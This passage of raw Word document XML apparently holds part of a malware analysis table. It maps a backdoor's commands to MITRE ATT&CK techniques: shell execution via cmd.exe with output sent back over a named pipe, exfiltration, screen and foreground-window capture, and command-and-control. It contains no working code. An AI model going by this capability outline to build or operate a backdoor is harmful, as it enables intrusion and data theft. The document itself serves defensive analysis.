                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69683691" w14:textId="04C0DCCA" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">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0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E0234FC" w14:textId="432F2C17" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B5CA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B5CA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15B79F5C" w14:textId="12AA44E8" w:rsidR="0022561D" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="406950E8" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2351AEDF" w14:textId="30DA6D1A" w:rsidR="0022561D" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B5CA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FAE6BA5" w14:textId="1D781C26" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00A55873" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="660647F1" w14:textId="4B201C62" w:rsidR="009B5CA6" w:rsidRDefault="009B5CA6" w:rsidP="009B5CA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="009B5CA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Run</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51890C93" w14:textId="2AF3CCD8" w:rsidR="009B5CA6" w:rsidRPr="009B5CA6" w:rsidRDefault="009B5CA6" w:rsidP="009B5CA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B5CA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">start a process via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009B5CA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CreateProcessW</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3164491F" w14:textId="11B44CE8" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="009B5CA6" w:rsidP="009B5CA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B5CA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="009B5CA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:tab/>
              <w:t>runs cmd.exe /c and gets the output via Named Pipe and sends the data back</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B5CA6" w:rsidRPr="00B857D7" w14:paraId="4C08C6B0" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="206C54C6" w14:textId="168837E5" w:rsidR="009B5CA6" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76FCE593" w14:textId="77777777" w:rsidR="009B5CA6" w:rsidRPr="00B857D7" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F003AB3" w14:textId="77777777" w:rsidR="009B5CA6" w:rsidRPr="00B857D7" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1048.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Exfiltration Over </w:t>
            </w:r>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Alternative Protocol&gt;:Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26D8E070" w14:textId="212EA98B" w:rsidR="009B5CA6" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6926E261" w14:textId="77777777" w:rsidR="009B5CA6" w:rsidRPr="00B857D7" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13C79E33" w14:textId="77777777" w:rsidR="009B5CA6" w:rsidRPr="00B857D7" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C0CC0C6" w14:textId="5F794BEE" w:rsidR="009B5CA6" w:rsidRPr="00B857D7" w:rsidRDefault="00A55873" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="404C5940" w14:textId="36D2D8CD" w:rsidR="009B5CA6" w:rsidRPr="009B5CA6" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00683513" w:rsidRPr="005B3D45" w14:paraId="56CC6A8B" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76798041" w14:textId="4312F5C1" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E3A25C4" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">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75" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07C79644" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">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45" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EDC5BD0" w14:textId="0BF3AE8A" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36BAFB60" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E4A7049" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48C27543" w14:textId="7E651A27" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00A55873" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="671975E3" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="00D400A7" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Then next command. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="44B56BBF" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50BA58B2" w14:textId="2190199C" w:rsidR="0022561D" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17E988D9" w14:textId="7E7964C0" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00D81824" w:rsidP="00D23EEA">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0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75339AAF" w14:textId="779D922C" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00D81824" w:rsidP="00D23EEA">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1113 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Screen Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C23212" w14:textId="0914AF16" w:rsidR="0022561D" w:rsidRDefault="00903F4B" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5007B82D" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="533175CE" w14:textId="0C235CC9" w:rsidR="0022561D" w:rsidRPr="00903F4B" w:rsidRDefault="00903F4B" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B814969" w14:textId="63034347" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00D81824" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19EA185D" w14:textId="719C79C9" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00683513">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>wnd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00683513">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00683513">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:tab/>
              <w:t>gets the text of the current foreground window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00683513" w:rsidRPr="005B3D45" w14:paraId="376F2D84" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="726C4C7D" w14:textId="37D7F04B" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FBF4DF2" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B3D45">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B3D45">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B3D45">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="291E248B" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B3D45">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">T1071.001 Application Layer </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B3D45">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
